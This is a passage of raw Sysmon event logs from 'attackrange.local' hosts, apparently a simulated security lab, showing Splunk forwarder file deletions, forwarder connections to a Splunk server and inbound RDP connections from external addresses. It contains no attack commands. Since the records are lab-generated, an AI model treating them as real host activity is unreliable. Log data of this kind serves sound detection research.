Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59551-false10.0.1.12-8000- 23542300x8000000000000000981488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:42.520{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD70AC10F4C5B4F49407FBF4871A9C31,SHA256=14E909A4D387DCABD8D0A87C6BFBD570EDDC0DE3B83826AE86876AD7AE9B632C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:42.176{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F64ACB269378A518DC8673127BBCC85,SHA256=DCF09C6C0E21BFF9E394FED80A498D4FB2DA25111A484A7D1D54ABF4E5BACA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:43.550{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8035DDF317EFF73B45012E4198C18393,SHA256=AA16A0C16167BA469E218C141488B5B27FC6DB274287258F92AC0D51F70459AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:43.102{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B32276B89396ECDE67D2938E5A3D6FE,SHA256=2A8C8143F92F78120073605D51181E14B66E96462C211A7C9445B78FB5925258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:44.659{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9730704B344FB5E878F89D44C51FBD7,SHA256=DBFBEF00A8D111A4D8614D107B46E0B640CAF9B9336992E0DA62B64D3097E6B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:44.581{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14A3FE7892E1C4810436A6AD3B9397E,SHA256=1F2FA57093AB296A43A04A1E41BE4E3C3B543F04838326E3C97067267631818C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:41.991{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54251-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:44.336{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5911F400F9713E9D4D8EC5D1704C65E7,SHA256=6E6BA9E8406A5E6B619A3BE9B24695584EC02EDF7A9A4759A66F162EFF23D93A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:45.816{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=380A5610DCC06E1601E1E9D9C53D6E42,SHA256=70D341F0BFB7885EF00D4184B8737A47F2FFB60D6BAC43492F9F833784E312F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:45.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82E6478D93244ABD5384E2D5FBED4C5,SHA256=8720F7BE3A55C89F237A4356D85DA100FA75B8338697D954324D2766FE0D5012,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:41.737{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59468-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001056973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:44.735{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63806-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:46.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEABF6576B3158C41FA6057692991042,SHA256=7EDECF8D1CC604A3A45F2AEADE452003EF49A29840B295D6A7A63BCA82D06E2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:43.011{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60300-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:46.066{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71FC1A2DA39F53B4363482B8384E7D33,SHA256=34FEC3FDC39048871CF8750D9385BC6658E8D9B38E231DDBEED5E3198E951EC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:46.117{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=96609029B770A9D57BE731E48BC2B425,SHA256=90EFDAC64F31AB0DD5B58A63CB4C4EEA9683F871D95C70F6AB7C856485B5D846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:46.117{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B6DBA3A5D0C96B09687CFC79B0E136E,SHA256=DE251A562BECA98E69DAF260647B6A911444E612A2BEE0797E1B5A81C81BEC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:47.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8374BD53946C7CBBA3460B46E8EA07CD,SHA256=F5211185A1DB1C9803E42D7DB66B8E3C5CEDFF2456AFDA3563687189FCFE1934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:47.034{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=512CE6B5BFE67BBF1D604DBF5D6076F7,SHA256=AF02A3B570A163686CDE43CB65F162F38C504E052DCE39F300EACFFF085893D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:48.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C00B7C574BB8FAA8662385BEB4E6163,SHA256=9B88B4CE1CB4B02A88DC5B05942C1F13AD4A4A2E8D261C2116EABC16DEAC34B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:48.050{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6D67B96DF5D33585F91533DA790365,SHA256=EE819B484F1ECF0680D5ECC3002A95AA64F4F75BAB2E39AE9561C2F2A6A3016F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:47.015{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:49.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0FACFBDF8BEC46AA4880C555F946BF9,SHA256=6815C0758DF9D5441C9B42D6CE3B3713749C8EB661CBE26489E51185ACC90B51,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:45.797{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59552-false10.0.1.12-8000- 23542300x8000000000000000981499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:49.081{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6401C81BC5EC4732FCCFED5543B5F1D3,SHA256=8C5A779F83CE4E93E86F14DB26452754BD87B7F4BB9FC41C00BC81906ECDBD3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:49.383{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=96609029B770A9D57BE731E48BC2B425,SHA256=90EFDAC64F31AB0DD5B58A63CB4C4EEA9683F871D95C70F6AB7C856485B5D846,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:48.014{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62747-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:50.477{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=664C0481C855361CF64BFDC395DD8449,SHA256=4B4DFCA56C97FC9826FA4A26AD00508820E14E6A2908971134E522D81E6B92C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:50.316{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E35C113931C76022DAB741B07E955A,SHA256=2DC20BBB11A39D9B0A2D3A8622D561451E26E837105C62855C4142E6F7976BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:51.493{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A84CDF86ADFFB924CB4D3140093542,SHA256=E091A22F3F050AF4165377248B760EA604D447B61E29CAF803749A66F9F43123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:51.550{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC78642D726085D15ADEA5F03C18F20,SHA256=22279BB9B91634CAA543EC94C3A0C3B18EC67DDDCC66B6F4C346E277E6A71574,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:52.664{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3506E7030B6067777860B3FFA13947AA,SHA256=4FBA8B91B36EF7928B96C663EBD8E972863A34B1A0B5BD97128ADB64E68D0520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:52.566{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978A63C5671D435CEE0BFAB4B29C647E,SHA256=AF69A79B4668926E292AB35F3CF6B5D90BE559E1E6E49F26A4F25113C2B0E87D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:52.109{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54253-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:51.920{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65078-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:51.653{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com50534-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:53.961{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC2E40C04020B78483133BA5524DB0C8,SHA256=8C9C6D5B76565FA6061B39ABD6EAE2FB5E5DBCFF3421E02BB1DC29EF5EC6B997,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:53.774{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F02A769EE4E67C8E96F99A0673F9CA,SHA256=4E0D4E475191A25D0F08EE92FAE0C839FBBC313BE2B5DDFD73C272456822899A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:53.691{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBF8148319BC6C1BC614D27BAD3E89F7,SHA256=0F02FA9DDBCB2CD32504817067665DDA608E958945B6317C175769D387291A8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:53.691{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FED1FEAD659110D8AF97F1F1AEB9BB20,SHA256=F53F3E1466743DB13AEC6C75091A57E984DDFAA78B6898DEC6A1405624780AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:53.644{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2E7ED87F75A6C020C23C74DD1DAF723,SHA256=4F1E6D3A194FDAA98F603963FE1A939FAA875F735F1A3121E129C7124EE62A80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:54.962{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E52520130E3591D3BE5138D4AD928896,SHA256=3DED9BB23D201431B2BCDE8CFEDB2C0C87C3376F40278B8D27D9DC83CB024A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:54.659{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B55A7574BF73EC0D551069CA1D31B90,SHA256=6CADC1D8D9012A765DFC27FFAD365E21B6F703518BE25BFB5A4A1FC3E0B4C495,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:50.962{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54627-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:51.719{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59553-false10.0.1.12-8000- 23542300x8000000000000000981509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:55.659{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E2672E96B42E67F97DBEB70E213E65,SHA256=57A8FC2A14DD524A9735A77870504DF9E1F6EF324F94EA0C28D30FA7E9C868B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981511Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:56.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F2618861F68364DE2D7FAED1DBCC288,SHA256=D1735F7AA29B1B04572AC2138EBF36D1B730E1C0CF814B9D7B6CFF2B2E312AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:56.212{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C371829E6F5B321B1B0BC328FED773,SHA256=F1A5EC01FE07D28E753D6502953509B2BCFCFBC67CB04471DF86ACC94CC63EA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981512Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:57.675{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F7B4C0AE369495603D6DDC7171DE9AB,SHA256=8778D4BC4291EA8242D2E6248B90BA0D4BA01F4F5BBFF1FCF6E48A605AC7CCA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:57.430{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F77430325108D892214B9ED093F4268,SHA256=7C4A769AC74ADE1FD486C1BD16EF0F46725CEC178BA1B1A1BB78C7A642C5EDAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:58.571{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37DB3F17015330A100EFE14ADDE05EEE,SHA256=F95CAAFCE5AC5199C9ADD548C4D734F40D126477A798B21313445F3730C38221,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:58.571{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A7941605E1CD82C49FA061CD8758BF,SHA256=DB306B35022ECBB0B78E23650BE71EBC2EAC9624EF148FE36D42939ABE8444F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981514Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:58.691{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754FF979B215EC9B6DCA64E8E5B6A395,SHA256=87B69C239ACBDDDA7A53ECF4B83052E57AB23E3409E4E50125ECA9C68E516E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981513Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:58.347{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 